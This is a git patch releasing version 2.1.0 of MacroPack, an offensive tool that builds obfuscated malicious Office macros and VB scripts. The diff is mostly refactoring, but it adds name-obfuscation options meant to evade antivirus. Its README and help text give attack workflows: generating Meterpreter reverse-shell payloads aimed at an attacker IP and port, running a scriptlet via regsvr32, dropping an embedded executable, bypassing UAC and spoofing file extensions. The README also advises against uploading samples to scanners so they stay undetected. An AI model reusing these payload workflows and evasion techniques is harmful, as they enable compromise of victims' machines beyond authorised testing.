From 728956c7758d65c090daf492abe605b44981ea8d Mon Sep 17 00:00:00 2001
From: sevagas <emeric.nasi@sevagas.com>
Date: Sun, 24 Jan 2021 13:49:34 +0100
Subject: [PATCH] Release of MacroPack 2.1.0

---
 README.md                        | 30 ++++++------
 src/common/definitions.py        |  4 +-
 src/common/help.py               | 28 +++++------
 src/common/mp_session.py         | 37 +++++++++++++--
 src/common/utils.py              | 45 ++++++++++--------
 src/macro_pack.py                | 66 ++++++++++++++++++--------
 src/modules/mp_generator.py      | 18 ++------
 src/modules/mp_module.py         | 38 +++++++--------
 src/modules/obfuscate_names.py   | 79 +++++++++++++++-----------------
 src/modules/obfuscate_strings.py |  6 +++
 src/modules/payload_builder.py   | 18 ++------
 src/modules/vba_gen.py           |  2 +-
 12 files changed, 211 insertions(+), 160 deletions(-)

diff --git a/README.md b/README.md
index c7fd422..a4b5a2f 100644
--- a/README.md
+++ b/README.md
@@ -39,7 +39,7 @@ Note that the main goal of macro\_pack obfuscation is not to prevent reverse eng
 
 ### Generation
 
-Macro Pack can generate several kind of MS office documents and scripts formats.
+Macro Pack can generate several kinds of MS office documents and scripts formats.
 The format will be automatically guessed depending on the given file extension.
 File generation is done using the option --generate or -G.  
 Macro Pack pro version also allow to trojan existing Office files with option --trojan or -T
@@ -87,10 +87,10 @@ I know this will not prevent usage by malicious people and that is why all featu
 
 ### About pro mode...
 You may notice that not all part of macro\_pack is available. Only the community version is available online.
-Features in the pro version are really "weaponizing" the process and I do not want them available to all script kiddies out there.
+Features in the pro version are really "weaponizing" the process, and I do not want them available to all script kiddies out there.
 The pro mode includes features such as:
 * Advance antimalware bypass
-* Shellcode injection
+* Advanced Shellcode injection methods
 * Command line obfuscation (Dosfuscation)
 * ASR and AMSI bypass
 * Self unpacking VBA/VBS payloads
@@ -110,6 +110,7 @@ Some short demo videos are available on the [sevagas youtube channel](https://ww
 Note that MP pro is only available as a commercial offer for professionals.
 If you are in an offensive security audit team and would like more information on how to get "pro" version you can contact me at emeric.nasi[ at ]sevagas.com using your professional email address.
 
+**Important:** If you wish to contact me about MacroPack pro, use my emeric.nasi [at] sevagas.com email address. Also please note that I will not answer to anonymous inquiries for the Pro version. Only to professional emails.
 
 
 ## Run/Install
@@ -308,6 +309,10 @@ echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G "\\192.168.0.8\c$\us
 
  Security bypass options:
     -o, --obfuscate Obfuscate code (remove spaces, obfuscate strings, obfuscate functions and variables name)
+    --obfuscate-names-charset=<CHARSET> Set a charset for obfuscated variables and functions
+        Choose between: alpha, alphanum, complete or provide the list of char you want
+    --obfuscate-names-minlen=<len> Set min length of obfuscated variables and functions (default 8)
+    --obfuscate-names-maxlen=<len> Set max length of obfuscated variables and functions (default 20)
     --uac-bypass Execute payload with high privileges if user is admin. Compatible with most MacroPack templates
 
 
@@ -401,9 +406,8 @@ This template also generates a  meterpreter.rc file to create the Metasploit han
   -> Example: ```msfconsole -r meterpreter.rc``` 
 
 
-### EMBED_EXE    
-        
-Drop and execute embedded file.
+### EMBED_EXE          
+Drop and execute an embedded file.
 Combine with --embed option, it will drop and execute the embedded file with random name under TEMP folder.
  -> Example: ```macro_pack.exe  -t EMBED_EXE --embed=c:\windows\system32\calc.exe -o -G my_calc.vbs```  
  
@@ -422,31 +426,31 @@ The various features were tested against locally installed Antimalware solutions
 A majority of antivirus static will be evaded by the simple "obfuscate" option. However, as most free tools payloads are generally caught by behavioural anaysis such as AMSI.
 Features available in MacroPack pro mode generally permit full AV bypass including AMSI.
 
-**Warning:** Do not submit your samples to online scanner (ex VirusTotal), Its the best way to break your stealth macro.
+**Warning:** Do not submit your samples to online scanner (ex VirusTotal), It's the best way to break your stealth macro.
 I also suggest you do not submit to non reporting site such as NoDistribute. You cannot be sure what these sites will do with the data you submit. 
 If you have an issue with macro\_pack AV detection you can write to us for advice or submit an issue or pull request.
 
 
 ## Relevant resources
 
-Blog posts about hacking with MS Office, VBS, and other retro stuff security:
+Blog posts about MacroPack Pro:
+ - https://blog.sevagas.com/?Launch-shellcodes-and-bypass-Antivirus-using-MacroPack-Pro-VBA-payloads
  - https://blog.sevagas.com/?EXCEL-4-0-XLM-macro-in-MacroPack-Pro (Excel 4.0 payloads in MacroPack Pro)
  - https://blog.sevagas.com/?Advanced-MacroPack-payloads-XLM-Injection (XLM injection in MacroPack Pro)
+
+Blog posts about hacking with MS Office, VBS, and other retro stuff security:
+ - https://blog.sevagas.com/?Bypass-Windows-Defender-Attack-Surface-Reduction
  - https://subt0x11.blogspot.fr/2018/04/wmicexe-whitelisting-bypass-hacking.html
  - http://blog.sevagas.com/?My-VBA-Bot (write a full VBA RAT, includes how to bypass VBOM protection)
  - http://blog.sevagas.com/?Hacking-around-HTA-files  (run hta code in non-hta files and hta polyglots)
- - http://pwndizzle.blogspot.fr/2017/03/office-document-macros-ole-actions-dde.html
  - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ (About Dynamic Data Exchange attacks)
  - https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
- - https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/
  
  Other useful links:
  - https://github.com/p3nt4/PowerShdll (Run PowerShell with dlls only)
  - https://gist.github.com/vivami/03780dd512fec22f3a2bae49f9023384 (Run powershell script with PowerShdll VBA implementation)
- - https://enigma0x3.net/2016/03/15/phishing-with-empire/ (Generate Empire VBA payload)
  - https://github.com/EmpireProject/Empire
  - https://medium.com/@vivami/phishing-between-the-app-whitelists-1b7dcdab4279
- - https://www.metasploit.com/
  - https://github.com/Cn33liz/MacroMeter
  - https://github.com/khr0x40sh/MacroShop
  - https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
@@ -467,6 +471,6 @@ Emails:
 
 [The Apache License 2.0](https://www.apache.org/licenses/LICENSE-2.0.html)
 
-Copyright 2017,2018,2019,2020 Emeric “Sio” Nasi ([blog.sevagas.com](https://blog.sevagas.com))
+Copyright 2017,2018,2019,2020,2021 Emeric “Sio” Nasi ([blog.sevagas.com](https://blog.sevagas.com))
 
 
diff --git a/src/common/definitions.py b/src/common/definitions.py
index 5337960..a7765b9 100644
--- a/src/common/definitions.py
+++ b/src/common/definitions.py
@@ -1,2 +1,2 @@
-VERSION="2.0.1-p1"
-LOGLEVEL = "INFO"
\ No newline at end of file
+VERSION="2.1.0"
+LOGLEVEL = "INFO"
diff --git a/src/common/help.py b/src/common/help.py
index 2f75f13..c856a1f 100644
--- a/src/common/help.py
+++ b/src/common/help.py
@@ -50,7 +50,7 @@ def getToolPres():
  ```batch
 # 1 Generate obfuscated VBS scriptlet and Metasploit resource file based on meterpreter reverse HTTPS template
 echo <ip> <port> | macro_pack.exe -t WEBMETER -o -G meter.sct
-# 2 On attacker machinge Setup meterpreter listener
+# 2 On attacker machine Setup meterpreter listener
 msfconsole -r webmeter.rc
 # 3 run scriptlet with regsvr32 
 regsvr32 /u /n /s /i:meter.sct scrobj.dll
@@ -148,7 +148,7 @@ def getTemplateUsage(currentApp):
     return templatesInfo
     
 
-def getGenerationFunction(currentApp):
+def getGenerationFunction():
     details = """ Main payload generation options:
     -G, --generate=OUTPUT_FILE_PATH. Generates a file. Will guess the payload format based on extension.
         MacroPack supports most Ms Office and VB based payloads as well various kinds of shortcut files. 
@@ -164,9 +164,13 @@ def getGenerationFunction(currentApp):
     return details
 
 
-def getAvBypassFunction(currentApp):
+def getAvBypassFunction():
     details = """ Security bypass options: 
     -o, --obfuscate Obfuscate code (remove spaces, obfuscate strings, obfuscate functions and variables name)
+    --obfuscate-names-charset=<CHARSET> Set a charset for obfuscated variables and functions
+        Choose between: alpha, alphanum, complete or provide the list of char you want
+    --obfuscate-names-minlen=<len> Set min length of obfuscated variables and functions (default 8)
+    --obfuscate-names-maxlen=<len> Set max length of obfuscated variables and functions (default 20)
     --uac-bypass Execute payload with high privileges if user is admin. Compatible with most MacroPack templates """ 
     return details
 
@@ -191,7 +195,7 @@ def getOtherFunction(currentApp):
             In this case, windows or linux explorers will show the file named as: somethingath.jpg
     -l, --listen=ROOT_PATH\tOpen an HTTP server from ROOT_PATH listening on default port 80.
     -w, --webdav-listen=ROOT_PATH Open a WebDAV server on default port 80, giving access to ROOT_PATH.
-    --port=PORT Specify the listening port for HTTP and WebDAV servers.""" % (currentApp)
+    --port=PORT Specify the listening port for HTTP and WebDAV servers.""" % currentApp
     return details
 
 
@@ -203,7 +207,7 @@ def getCommunityUsage(currentApp):
 
 %s
 
-""" % (getGenerationFunction(currentApp), getAvBypassFunction(currentApp), getOtherFunction(currentApp))
+""" % (getGenerationFunction(), getAvBypassFunction(), getOtherFunction(currentApp))
     return details
     
 
@@ -231,7 +235,7 @@ def printAvailableFormats(banner):
         printAvailableFormatsPro()
     
 
-def printCommunityUsage(banner, currentApp, mpSession):
+def printCommunityUsage(banner, currentApp):
     print(colored(banner, 'green'))
     print(" Usage 1: echo  <parameters> | %s -t <TEMPLATE> -G <OUTPUT_FILE> [options] " %currentApp)
     print(" Usage 2: %s  -f input_file_path -G <OUTPUT_FILE> [options] " % currentApp)
@@ -252,7 +256,7 @@ def printCommunityUsage(banner, currentApp, mpSession):
     
     
 
-def printProUsage(banner, currentApp, mpSession):
+def printProUsage(banner, currentApp):
     print(colored(banner, 'green'))
     print(" Usage 1: echo  <parameters> | %s -t <TEMPLATE> -G <OUTPUT_FILE> [options] " %currentApp)
     print(" Usage 2: %s  -f input_file_path -G <OUTPUT_FILE> [options] " % currentApp)
@@ -267,7 +271,7 @@ def printProUsage(banner, currentApp, mpSession):
 %s
 %s
 
-""" % (getGenerationFunction(currentApp), getGenerationFunctionPro(), getAvBypassFunction(currentApp), getAvBypassFunctionPro(), getOtherFunction(currentApp), getOtherFunctionPro())
+""" % (getGenerationFunction(), getGenerationFunctionPro(), getAvBypassFunction(), getAvBypassFunctionPro(), getOtherFunction(currentApp), getOtherFunctionPro())
     details +="    -h, --help   Displays help and exit \n"
 
     print(details)
@@ -281,11 +285,9 @@ def printTemplatesUsage(banner, currentApp):
 
     
     
-def printUsage(banner, currentApp, mpSession):
+def printUsage(banner, currentApp):
     if MP_TYPE=="Pro":
-        printProUsage(banner, currentApp, mpSession)
+        printProUsage(banner, currentApp)
     else:
-        printCommunityUsage(banner, currentApp, mpSession)
-
-
+        printCommunityUsage(banner, currentApp)
 
diff --git a/src/common/mp_session.py b/src/common/mp_session.py
index 554dbac..2eb97b3 100644
--- a/src/common/mp_session.py
+++ b/src/common/mp_session.py
@@ -1,5 +1,6 @@
 #!/usr/bin/env python
 # encoding: utf-8
+import string
 
 from common.utils import MSTypes
 
@@ -15,13 +16,17 @@ def __init__(self, workingPath, version, mpType):
         self._outputFileType = MSTypes.UNKNOWN    
 
         # regular Attrs
-        self.uacBypass  = False
+        self.uacBypass = False
         self.obfuscateForm =  False
         self.obfuscateNames =  False
         self.obfuscateStrings =  False
         self.obfOnlyMain = False
         self.doNotObfConst = False
         self.ObfReplaceConstants = True
+
+        self.obfuscatedNamesMinLen = 8
+        self.obfuscatedNamesMaxLen = 20
+        self._obfuscatedNamesCharset = string.ascii_lowercase
         
         self.fileInput = None
         self.startFunction = None
@@ -29,9 +34,8 @@ def __init__(self, workingPath, version, mpType):
         self.template = None
         self.ddeMode = False # attack using Dynamic Data Exchange (DDE) protocol (see https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/)
         self.dosCommand = None
-        self.icon = "%windir%\system32\imageres.dll,67" # by default JPG immage icon
+        self.icon = "%windir%\system32\imageres.dll,67" # by default JPG image icon
 
-       
         self.runTarget = None
         self.runVisible = False
         self.forceYes = False
@@ -63,3 +67,30 @@ def outputFilePath(self):
     def outputFilePath(self, outputFilePath):
         self._outputFilePath = outputFilePath
         self._outputFileType = MSTypes.guessApplicationType(self._outputFilePath)
+
+
+    """
+    https://docs.microsoft.com/en-us/office/vba/language/concepts/getting-started/visual-basic-naming-rules
+    Use the following rules when you name procedures, constants, variables, and arguments in a Visual Basic module:
+     - You must use a letter as the first character.
+     - You can't use a space, period (.), exclamation mark (!), or the characters @, &, $, # in the name.
+     - Name can't exceed 255 characters in length
+    """
+
+    @property
+    def obfuscatedNamesCharset(self):
+        return self._obfuscatedNamesCharset
+
+    @obfuscatedNamesCharset.setter
+    def obfuscatedNamesCharset(self, charset):
+        if charset == "alpha":
+            self._obfuscatedNamesCharset = string.ascii_lowercase
+        elif charset == "alphanum":
+            self._obfuscatedNamesCharset = string.ascii_lowercase + string.digits
+        elif charset == "complete":
+            self._obfuscatedNamesCharset = string.ascii_lowercase + string.digits + r"_"
+        else:
+            self._obfuscatedNamesCharset = charset
+
+
+
diff --git a/src/common/utils.py b/src/common/utils.py
index e67ba53..5ed113d 100644
--- a/src/common/utils.py
+++ b/src/common/utils.py
@@ -38,6 +38,14 @@ def randomAlpha(length):
     return key
 
 
+def randomStringBasedOnCharset(length, charset):
+    """ Returns a random alphabetic string of length 'length' """
+    key = ''
+    for i in range(length): # @UnusedVariable
+        key += choice(charset)
+    return key
+
+
 def extractStringsFromText(text):      
     import re
     result = ""
@@ -49,7 +57,7 @@ def extractStringsFromText(text):
 
 
 def extractWordInString(strToParse, index):
-    """ Exract word (space separated ) at current index"""
+    """ Extract word (space separated ) at current index"""
     i = index
     while i!=0 and strToParse[i-1] not in " \t\n&|":
         i = i-1
@@ -64,7 +72,7 @@ def extractWordInString(strToParse, index):
 
 
 def extractPreviousWordInString(strToParse, index):
-    """ Exract the word (space separated ) preceding the one at current index"""
+    """ Extract the word (space separated ) preceding the one at current index"""
     # Look for beginning or word
     i = index
     if strToParse[i] not in " \t\n":
@@ -82,7 +90,7 @@ def extractPreviousWordInString(strToParse, index):
 
 
 def extractNextWordInString(strToParse, index):
-    """ Exract the word (space separated ) following the one at current index"""
+    """ Extract the word (space separated) following the one at current index"""
     # Look for beginning or word
     i = index
     while i!=len(strToParse) and strToParse[i] not in " \t\n&|":
@@ -99,7 +107,7 @@ def extractNextWordInString(strToParse, index):
 
 
 def getHostIp():
-    """ returne current facing IP address """
+    """ return current facing IP address """
     s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
     try:
         # doesn't have to be reachable
@@ -121,9 +129,9 @@ def getRunningApp():
     
 
 def checkIfProcessRunning(processName):
-    '''
+    """
     Check if there is any running process that contains the given name processName.
-    '''
+    """
     #Iterate over the all the running process
     for proc in psutil.process_iter():
         try:
@@ -132,7 +140,7 @@ def checkIfProcessRunning(processName):
                 return True
         except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
             pass
-    return False;
+    return False
 
 
 
@@ -152,9 +160,9 @@ def yesOrNo(question):
 
    
 def forceProcessKill(processName):
-    '''
+    """
     Force kill a process (only work on windows)
-    '''
+    """
     os.system("taskkill /f /im  %s >nul 2>&1" % processName)
 
   
@@ -200,7 +208,7 @@ def getParamValue(paramArray, paramName):
 isBinaryString = lambda bytes: bool(bytes.translate(None, textchars))
 
 
-class MSTypes():
+class MSTypes:
     XL="Excel"
     XL97="Excel97"
     WD="Word"
@@ -235,12 +243,13 @@ class MSTypes():
     MSI="Installer"
     UNKNOWN = "Unknown"
 
-    WORD_AND_EXCEL_FORMATS = [ XL, XL97, WD, WD97] 
+    WORD_AND_EXCEL_FORMATS = [XL, XL97, WD, WD97]
     MS_OFFICE_BASIC_FORMATS =  WORD_AND_EXCEL_FORMATS + [PPT] 
-    MS_OFFICE_FORMATS = MS_OFFICE_BASIC_FORMATS + [ MPP, VSD, VSD97, ACC] # Formats supported by macro_pack
-    VBSCRIPTS_BASIC_FORMATS = [VBS, HTA, SCT, WSF ]
+    MS_OFFICE_FORMATS = MS_OFFICE_BASIC_FORMATS + [MPP, VSD, VSD97, ACC] # Formats supported by macro_pack
+    VBSCRIPTS_BASIC_FORMATS = [VBS, HTA, SCT, WSF]
     VBSCRIPTS_FORMATS = VBSCRIPTS_BASIC_FORMATS + [XSL]
     VB_FORMATS = VBSCRIPTS_FORMATS + MS_OFFICE_FORMATS
+    VB_FORMATS_EXT = VB_FORMATS + [VBA] # VBA format is non executable
     
     Shortcut_FORMATS = [LNK, GLK, SCF, URL, SETTINGS_MS, LIBRARY_MS, INF, IQY, SYLK, CHM, CMD, CSPROJ]
     
@@ -250,12 +259,12 @@ class MSTypes():
     PE_FORMATS = [EXE, DLL]
 
     # OrderedDict([("target_url",None),("download_path",None)])
-    EXTENSION_DICT = OrderedDict([ (LNK,".lnk"),( GLK,".glk"),( SCF,".scf"),( URL,".url"), (SETTINGS_MS,".SettingContent-ms"),(LIBRARY_MS,".library-ms"),(INF,".inf"),(IQY, ".iqy"),
+    EXTENSION_DICT = OrderedDict([(LNK,".lnk"),(GLK,".glk"),(SCF,".scf"),(URL,".url"), (SETTINGS_MS,".SettingContent-ms"),(LIBRARY_MS,".library-ms"),(INF,".inf"),(IQY, ".iqy"),
                                   (SYLK,".slk"),(CHM,".chm"),(CMD,".cmd"),(CSPROJ,".csproj"),
-                                  ( XL,".xlsm"),( XL97,".xls"),( WD,".docm"),
-                                  (WD97,".doc"),( PPT,".pptm"),( PPT97,".ppt"),( MPP,".mpp"),( PUB,".pub"),( VSD,".vsdm"),( VSD97,".vsd"),
-                                  (VBA,".vba"),( VBS,".vbs"),( HTA,".hta"),( SCT,".sct"),( WSF,".wsf"),( XSL,".xsl"),( ACC,".accdb"), ( ACC,".mdb" ),
-                                   (EXE,".exe"),( DLL,".dll"),(MSI,".msi")])
+                                  (XL,".xlsm"),(XL97,".xls"),(WD,".docm"),
+                                  (WD97,".doc"),(PPT,".pptm"),(PPT97,".ppt"),(MPP,".mpp"),( PUB,".pub"),( VSD,".vsdm"),(VSD97,".vsd"),
+                                  (VBA,".vba"),(VBS,".vbs"),(HTA,".hta"),(SCT,".sct"),(WSF,".wsf"),(XSL,".xsl"),(ACC,".accdb"), (ACC,".mdb"),
+                                   (EXE,".exe"),(DLL,".dll"),(MSI,".msi")])
 
 
 
diff --git a/src/macro_pack.py b/src/macro_pack.py
index 6b17f3d..7fac282 100755
--- a/src/macro_pack.py
+++ b/src/macro_pack.py
@@ -13,7 +13,6 @@
 from modules.payload_builder_factory import PayloadBuilderFactory
 from common import utils, mp_session, help
 from common.utils import MSTypes
-from _ast import arg
 from common.definitions import VERSION, LOGLEVEL
 if sys.platform == "win32":
     try:
@@ -23,8 +22,8 @@
         sys.exit(1)
 MP_TYPE="Pro"
 if utils.checkModuleExist("pro_core"):
-    from pro_modules.dcom_run import DcomGenerator
-    from pro_modules.containers import ContainerGenerator
+    from pro_modules.utilities.dcom_run import DcomGenerator
+    from pro_modules.payload_builders.containers import ContainerGenerator
     from pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro
     from pro_core import arg_mgt_pro, mp_session_pro
 else:
@@ -54,7 +53,11 @@ def main(argv):
         mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE)
 
     try:
-        longOptions = ["embed=", "listen=", "port=", "webdav-listen=", "generate=", "quiet", "input-file=", "encode","obfuscate","obfuscate-form", "obfuscate-names", "obfuscate-strings", "file=","template=","listtemplates","listformats","icon=", "start-function=","uac-bypass","unicode-rtlo=", "dde", "print", "force-yes"]
+        longOptions = ["embed=", "listen=", "port=", "webdav-listen=", "generate=", "quiet", "input-file=", "encode",
+                       "obfuscate", "obfuscate-form", "obfuscate-names", "obfuscate-strings",
+                       "obfuscate-names-charset=", "obfuscate-names-minlen=", "obfuscate-names-maxlen=",
+                       "file=","template=","listtemplates","listformats","icon=", "start-function=","uac-bypass",
+                       "unicode-rtlo=", "dde", "print", "force-yes", "help"]
         shortOptions= "e:l:w:s:f:t:G:hqmop"
         # only for Pro release
         if MP_TYPE == "Pro":
@@ -62,11 +65,11 @@ def main(argv):
             shortOptions += arg_mgt_pro.proArgsShortOptions
         # Only enabled on windows
         if sys.platform == "win32":
-            longOptions.extend([ "run=", "run-visible"])
+            longOptions.extend(["run=", "run-visible"])
 
         opts, args = getopt.getopt(argv, shortOptions, longOptions) # @UnusedVariable
     except getopt.GetoptError:
-        help.printUsage(BANNER, sys.argv[0], mpSession)
+        help.printUsage(BANNER, sys.argv[0])
         sys.exit(2)
     for opt, arg in opts:
         if opt in ("-o", "--obfuscate"):
@@ -77,12 +80,36 @@ def main(argv):
             mpSession.obfuscateForm =  True
         elif opt=="--obfuscate-names":
             mpSession.obfuscateNames =  True
+        elif opt=="--obfuscate-names-charset":
+            try:
+                mpSession.obfuscatedNamesCharset = arg
+            except ValueError:
+                help.printUsage(BANNER, sys.argv[0])
+                sys.exit(0)
+        elif opt=="--obfuscate-names-minlen":
+            try:
+                mpSession.obfuscatedNamesMinLen = int(arg)
+            except ValueError:
+                help.printUsage(BANNER, sys.argv[0])
+                sys.exit(0)
+            if mpSession.obfuscatedNamesMinLen < 4 or mpSession.obfuscatedNamesMinLen > 255:
+                help.printUsage(BANNER, sys.argv[0])
+                sys.exit(0)
+        elif opt=="--obfuscate-names-maxlen":
+            try:
+                mpSession.obfuscatedNamesMaxLen = int(arg)
+            except ValueError:
+                help.printUsage(BANNER, sys.argv[0])
+                sys.exit(0)
+            if mpSession.obfuscatedNamesMaxLen < 4 or mpSession.obfuscatedNamesMaxLen > 255:
+                help.printUsage(BANNER, sys.argv[0])
+                sys.exit(0)
         elif opt=="--obfuscate-strings":
             mpSession.obfuscateStrings =  True
         elif opt=="-s" or opt=="--start-function":
             mpSession.startFunction =  arg
         elif opt=="-l" or opt=="--listen":
-            mpSession.listen =  True
+            mpSession.listen = True
             mpSession.listenRoot = os.path.abspath(arg)
         elif opt=="--port":
             mpSession.listenPort = int(arg)
@@ -126,14 +153,13 @@ def main(argv):
             help.printAvailableFormats(BANNER)
             sys.exit(0)
         elif opt=="-h" or opt=="--help":
-            help.printUsage(BANNER, sys.argv[0], mpSession)
+            help.printUsage(BANNER, sys.argv[0])
             sys.exit(0)
         else:
             if MP_TYPE == "Pro":
                 arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER)
             else:
-                #print("opt:%s, arg:%s",(opt,arg))
-                help.printUsage(BANNER, sys.argv[0], mpSession)
+                help.printUsage(BANNER, sys.argv[0])
                 sys.exit(0)
 
     if logLevel == "INFO":
@@ -150,10 +176,10 @@ def main(argv):
     # check input args
     if mpSession.fileInput is None:
         # Argument not supplied, try to get file content from stdin
-        if os.isatty(0) == False: # check if something is being piped
+        if not os.isatty(0): # check if something is being piped
             logging.info("   [-] Waiting for piped input feed...")
             mpSession.stdinContent = sys.stdin.readlines()
-            # Close Stdin pipe so we can call input() later without triggering EOF
+            # Close Stdin pipe, so we can call input() later without triggering EOF
             #sys.stdin.close()
             if sys.platform == "win32":
                 sys.stdin = open("conIN$")
@@ -169,7 +195,7 @@ def main(argv):
             logging.info("   [-] Input file path: %s" % mpSession.fileInput)
 
     if MP_TYPE == "Pro":
-        if mpSession.communityMode == True:
+        if mpSession.communityMode:
             logging.warning("   [!] Running in community mode (pro features not applied)")
             MP_TYPE="Community"
         else:
@@ -187,12 +213,12 @@ def main(argv):
             sys.exit(2)
         else:
             logging.info("   [-] Target output format: %s" %  mpSession.outputFileType)
-    elif mpSession.listen == False and mpSession.Wlisten == False and mpSession.runTarget is None and (MP_TYPE != "Pro" or mpSession.dcomTarget is None):
+    elif not mpSession.listen and not mpSession.Wlisten and mpSession.runTarget is None and (MP_TYPE != "Pro" or mpSession.dcomTarget is None):
         logging.error("   [!] You need to provide an output file! (get help using %s -h)" % os.path.basename(utils.getRunningApp()))
         sys.exit(2)
 
 
-    if mpSession.isTrojanMode==False:
+    if not mpSession.isTrojanMode:
         # verify that output file does not already exist
         if os.path.isfile(mpSession.outputFilePath):
             logging.error("   [!] ERROR: Output file %s already exist!" % mpSession.outputFilePath)
@@ -205,14 +231,14 @@ def main(argv):
 
     try:
         # Create temporary work file.
-        if mpSession.ddeMode or mpSession.template or (mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA] and mpSession.htaMacro==False):
+        if mpSession.ddeMode or mpSession.template or (mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA] and not mpSession.htaMacro):
             inputFile = os.path.join(working_directory, "command.cmd")
         else:
             inputFile = os.path.join(working_directory, utils.randomAlpha(9)) + ".vba"
         if mpSession.stdinContent is not None:
             import time
             time.sleep(0.4) # Needed to avoid some weird race condition
-            logging.info("   [-] Store std input in file..." )
+            logging.info("   [-] Store std input in file...")
             f = open(inputFile, 'w')
             f.writelines(mpSession.stdinContent)
             f.close()
@@ -226,7 +252,7 @@ def main(argv):
                     if os.path.isdir(working_directory):
                         shutil.rmtree(working_directory)
                     sys.exit(2)
-                logging.info("   [-] Store input file..." )
+                logging.info("   [-] Store input file...")
                 shutil.copy2(mpSession.fileInput, inputFile)
         
         if os.path.isfile(inputFile): 
@@ -235,7 +261,7 @@ def main(argv):
             
         # Edit outputfile name to spoof extension if unicodeRtlo option is enabled
         if mpSession.unicodeRtlo:
-            # Reminer; mpSession.unicodeRtlo contains the extension we want to spoof, such as "jpg"
+            # Reminder; mpSession.unicodeRtlo contains the extension we want to spoof, such as "jpg"
             logging.info(" [+] Inject %s false extension with unicode RTLO" % mpSession.unicodeRtlo)
             # Separate document path and extension
             (fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath)
@@ -253,7 +279,7 @@ def main(argv):
 
         # Retrieve the right payload builder
         if mpSession.outputFileType != MSTypes.UNKNOWN:
-            if MP_TYPE == "Pro" and mpSession.communityMode == False:
+            if MP_TYPE == "Pro" and not mpSession.communityMode:
                 payloadBuilder = PayloadBuilderFactoryPro().getPayloadBuilder(mpSession)
             else:
                 payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession)
diff --git a/src/modules/mp_generator.py b/src/modules/mp_generator.py
index 4ed7f23..ed8ed06 100644
--- a/src/modules/mp_generator.py
+++ b/src/modules/mp_generator.py
@@ -9,24 +9,16 @@ class PayloadBuilder(MpModule):
     
     def __init__(self,mpSession):
         self.embeddedFilePath = mpSession.embeddedFilePath
-        super().__init__(mpSession)    
-    
-    
-        
-    def embedFile(self):
-        """
-        Embed the content of  self.embeddedFilePath inside the generated target file
-        """
-        raise NotImplementedError
+        super().__init__(mpSession)
     
     
     def generate(self):
         """ Generate the targeted file """
         raise NotImplementedError
-    
+
+
     def check(self):
-        """ Verify generation feasability return true if ok, false if not"""
-        
+        """ Verify generation feasibility return true if ok, false if not"""
         raise NotImplementedError
     
     
@@ -49,7 +41,7 @@ def processDosCommandLine(self,commandLine):
     def run(self):
         
         logging.info(" [+] Prepare %s file generation..." % self.outputFileType)
-        # Check feasability
+        # Check feasibility
         if not self.check():
             return
         
diff --git a/src/modules/mp_module.py b/src/modules/mp_module.py
index 75c21ef..f05a47f 100644
--- a/src/modules/mp_module.py
+++ b/src/modules/mp_module.py
@@ -6,7 +6,7 @@
 from common.utils import MSTypes
 import shlex
 
-class MpModule():
+class MpModule:
     def __init__(self,mpSession):
         self.mpSession = mpSession
         self.workingPath = mpSession.workingPath
@@ -42,7 +42,7 @@ def startFunction(self):
              
             vbaFiles = self.getVBAFiles()
             for vbaFile in vbaFiles:
-                if  os.stat(vbaFile).st_size != 0:  
+                if os.stat(vbaFile).st_size != 0:
                     with open(vbaFile, 'rb', 0) as file, mmap.mmap(file.fileno(), 0, access=mmap.ACCESS_READ) as s:
                         for potentialStartFunction in self.potentialStartFunctions:
                             if s.find(potentialStartFunction.encode()) != -1:
@@ -72,7 +72,7 @@ def getCMDFile(self):
     
     def fillInputParams(self, paramDict):
         """ 
-        Fill parameters dictionnary using given input. If input is missing, ask for input to user 
+        Fill parameters dictionary using given input. If input is missing, ask for input to user.
         """
         # Fill parameters based on input file
         cmdFile = self.getCMDFile()
@@ -82,14 +82,13 @@ def fillInputParams(self, paramDict):
             logging.debug("    -> CMD file content: \n%s" % valuesFileContent)
             f.close()
             os.remove(cmdFile)
-            if self.mpSession.fileInput is None or len(paramDict) > 1:# if values where passed by input pipe or in a file but there are multiple parame
-            #if len(paramDict) > 1:
+            if self.mpSession.fileInput is None or len(paramDict) > 1:# if values where passed by input pipe or in a file but there are multiple params
                 inputValues = shlex.split(valuesFileContent)# split on space but preserve what is between quotes
             else: 
                 inputValues = [valuesFileContent] # value where passed using -f option
             if len(inputValues) >= len(paramDict): 
                 i = 0  
-                # Fill entry parameterds
+                # Fill entry parameters
                 for key, value in paramDict.items():
                     paramDict[key] = inputValues[i]
                     i += 1
@@ -98,7 +97,7 @@ def fillInputParams(self, paramDict):
                 return
         else:
             # if input was not provided
-            logging.warn("   [!] Could not find input parameters. Please provide the next values:")
+            logging.warning("   [!] Could not find input parameters. Please provide the next values:")
             for key, value in paramDict.items():
                 if value is None or value == "" or value.isspace():
                     newValue = None
@@ -109,14 +108,14 @@ def fillInputParams(self, paramDict):
     
     def fillInputParams2(self, paramArray):
         """ 
-        Fill parameters dictionnary using given input. If input is missing, ask for input to user 
+        Fill parameters dictionary using given input. If input is missing, ask for input to user.
         """
         # Fill parameters based on input file
         allMandatoryParamFilled = False
         i = 0
         mandatoryParamLen= 0
         while i < len(paramArray):
-            if paramArray[i].optional== False:
+            if not paramArray[i].optional:
                 mandatoryParamLen += 1 
             i += 1
         if mandatoryParamLen == 0:
@@ -129,8 +128,7 @@ def fillInputParams2(self, paramArray):
             logging.debug("    -> CMD file content: \n%s" % valuesFileContent)
             f.close()
             os.remove(cmdFile)
-            if self.mpSession.fileInput is None or len(paramArray) > 1:# if values where passed by input pipe or in a file but there are multiple parame
-            #if len(paramDict) > 1:
+            if self.mpSession.fileInput is None or len(paramArray) > 1:# if values where passed by input pipe or in a file but there are multiple params
